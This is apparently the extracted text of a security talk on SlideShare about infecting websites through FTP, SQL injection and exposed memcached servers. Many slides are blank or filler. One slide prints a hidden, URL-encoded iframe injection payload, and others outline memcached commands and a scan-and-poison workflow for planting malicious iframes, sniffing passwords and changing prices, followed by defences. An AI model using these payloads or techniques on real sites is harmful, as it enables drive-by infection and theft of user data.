Your SlideShare is downloading. ×
[FTP|SQL|Cache]    Injections   David BarrosoHead of Security Intelligence  Telefonica Digital
ddddddasdfsdf                      27%                                73%http://www.iframeinjectionattack.com/how-to-remov...
IntroductionCache basicsDemoSummary
How can I infect a web?Or, how can I forward visitors to a controlled webpage?                                            ...
MPack          The attacker          compromises a               Attacker          website and injects                    ...
First optionDifficulty: easy                   Pág. 6
Pág. 7
Pág. 8
SQL InjectionDifficulty: easy                   Pág. 9
Pág. 10
Pág. 11
Pág. 12
Pág. 13
A tener en cuenta Which users do I want to infect?    Focus your efforts    Example: brazilian webpages SEO and web ra...
Second optionsDifficulty: medium                     Pág. 15
Pág. 16
Pág. 17
Pág. 18
Pág. 19
Pág. 20
Pág. 21
Choose your preferredinfection kit99% LAMP: Linux + Apache + Mysql + PHP                                         Pág. 22
Pág. 23
Pág. 24
Pág. 25
Pág. 26
Pág. 27
ddddddasdfsdf Simple: <iframe src=‘http://www.malicious.com’></iframe> Not so simple:<Script Language=Javascript>       ...
And how a web cache isrelated?Specifically: memcached                          Pág. 29
ddddddasdfsdfCache A component that transparently stores data so that future  requests for that data can be served faster...
ddddddasdfsdf                      73%                27%
ddddddasdfsdf             Created on 2003 forLiveJournal             Associative array(hash table)             YouTube,...
ddddddasdfsdf Telnet based commands Commands    Set (flags timeout bytes)    Get    Stats        27%        Items   ...
ddddddasdfsdf Sensepost analyzed the security issues back on 2010 They developed go-derper.rb    Identifcation    Stor...
InfectionsiFrame/JS maliciousinjectionConfidential informationPasswordsPrices!
Let’s see some practicalstuffTake care with all those memcached!                                      Pág. 37
ddddddasdfsdfDemo Memcached access   27% Key/value storage     73%
ddddddasdfsdf set FIRST 0 0 11    Hello FIRST get FIRST stats items        27% stats cachedump n 10             73%
ddddddasdfsdfDemo Overwriting values   27% (iFrame – infection kit)      73%
ddddddasdfsdf iFrame injection        27%              73%
ddddddasdfsdfDemo Password sniffing   27% Data mangling (prices)      73%
ddddddasdfsdf Password sniffing        27%              73%
ddddddasdfsdf Data mangling (prices)        27%              73%
ddddddasdfsdf Data mangling (prices)        27%              73%
ddddddasdfsdf              27%                    73%Source: http://www.sensepost.com/blog/4873.html
ddddddasdfsdf CacheT: an alternative to FTP-Toolz  and SQL Injection Kitz go-derper.rb patch Proof of concept         2...
ddddddasdfsdf Protect your memcached from external access     Firewall     Listen only to localhost We haven’t seen ma...
ObrigadoDavid Barroso   @lostinsecurity
[FTP|SQL|Cache] Injections
Upcoming SlideShare
Loading in...5
×

[FTP|SQL|Cache] Injections

4,170

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
4,170
On Slideshare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "[FTP|SQL|Cache] Injections"

  1. 1. [FTP|SQL|Cache] Injections David BarrosoHead of Security Intelligence Telefonica Digital
  2. 2. ddddddasdfsdf 27% 73%http://www.iframeinjectionattack.com/how-to-remove-this-site-may-harm-your-computer.html
  3. 3. IntroductionCache basicsDemoSummary
  4. 4. How can I infect a web?Or, how can I forward visitors to a controlled webpage? Pág. 4
  5. 5. MPack The attacker compromises a Attacker website and injects The malcode an iFrame connects back to the C&C C&C iFRAME Infection kit Servidor Web legítimo www.mydomain.com) The visitor is forwarded to an infection kit The visitor browses a normal website (with User a malicious iframe) Pág. 5
  6. 6. First optionDifficulty: easy Pág. 6
  7. 7. Pág. 7
  8. 8. Pág. 8
  9. 9. SQL InjectionDifficulty: easy Pág. 9
  10. 10. Pág. 10
  11. 11. Pág. 11
  12. 12. Pág. 12
  13. 13. Pág. 13
  14. 14. A tener en cuenta Which users do I want to infect?  Focus your efforts  Example: brazilian webpages SEO and web ranking  Alexa Ranking It’s not only about infection  Sometimes is only about web ranking  Spam comments in blogs  Playing with HTML entities(ex. <noscript>) Pág. 14 Pág. 14
  15. 15. Second optionsDifficulty: medium Pág. 15
  16. 16. Pág. 16
  17. 17. Pág. 17
  18. 18. Pág. 18
  19. 19. Pág. 19
  20. 20. Pág. 20
  21. 21. Pág. 21
  22. 22. Choose your preferredinfection kit99% LAMP: Linux + Apache + Mysql + PHP Pág. 22
  23. 23. Pág. 23
  24. 24. Pág. 24
  25. 25. Pág. 25
  26. 26. Pág. 26
  27. 27. Pág. 27
  28. 28. ddddddasdfsdf Simple: <iframe src=‘http://www.malicious.com’></iframe> Not so simple:<Script Language=Javascript> 27% document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%6 73%3%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%3E%3C%2F%69%66%72%61%6D%65%3E));</Script>
  29. 29. And how a web cache isrelated?Specifically: memcached Pág. 29
  30. 30. ddddddasdfsdfCache A component that transparently stores data so that future requests for that data can be served faster. The data that is stored within a cache might be values that have been computed earlier or duplicates of original values that are stored27% elsewhere. (Wikipedia) 73% Examples: CPU, Disk, DNS, ARP, etc. Main security attack: poisoning
  31. 31. ddddddasdfsdf 73% 27%
  32. 32. ddddddasdfsdf  Created on 2003 forLiveJournal  Associative array(hash table)  YouTube, Reddit, FaceBook, Orange, Twitter, etc.27%  Memory-based  Keys (250b), Values (1MB) 73%  Default port: 11211/tcp  No authentication  Some caches are on the Internet  Optional(not often used): SASL
  33. 33. ddddddasdfsdf Telnet based commands Commands  Set (flags timeout bytes)  Get  Stats 27%  Items  Cachedump 73%
  34. 34. ddddddasdfsdf Sensepost analyzed the security issues back on 2010 They developed go-derper.rb  Identifcation  Storage of k keys and values  Regular expressiones 27%  It can overwrite existing keys and values 73% Main problems  Which web app is using these data?  How can I find ‘interesting’ data?
  35. 35. InfectionsiFrame/JS maliciousinjectionConfidential informationPasswordsPrices!
  36. 36. Let’s see some practicalstuffTake care with all those memcached! Pág. 37
  37. 37. ddddddasdfsdfDemo Memcached access 27% Key/value storage 73%
  38. 38. ddddddasdfsdf set FIRST 0 0 11  Hello FIRST get FIRST stats items 27% stats cachedump n 10 73%
  39. 39. ddddddasdfsdfDemo Overwriting values 27% (iFrame – infection kit) 73%
  40. 40. ddddddasdfsdf iFrame injection 27% 73%
  41. 41. ddddddasdfsdfDemo Password sniffing 27% Data mangling (prices) 73%
  42. 42. ddddddasdfsdf Password sniffing 27% 73%
  43. 43. ddddddasdfsdf Data mangling (prices) 27% 73%
  44. 44. ddddddasdfsdf Data mangling (prices) 27% 73%
  45. 45. ddddddasdfsdf 27% 73%Source: http://www.sensepost.com/blog/4873.html
  46. 46. ddddddasdfsdf CacheT: an alternative to FTP-Toolz and SQL Injection Kitz go-derper.rb patch Proof of concept 27% Once you find some memcached hosts(nmap) 73% entries  Dump of all their  Look for HTML data  Malicious injection (iFrame/JavaScript) Not published yet (only malicious purposes)
  47. 47. ddddddasdfsdf Protect your memcached from external access  Firewall  Listen only to localhost We haven’t seen malicious infections using theses caches  But it’s a very attractive asset, because many of the large 27% websites are using it  From the malicious point of view, it doesn’t mind if you don’t 73% know which webapp is behind It’s very easy to code a tool scanning for open memcached (or similar caches) and then infect all of them  nmap + go-derper.rb
  48. 48. ObrigadoDavid Barroso @lostinsecurity

×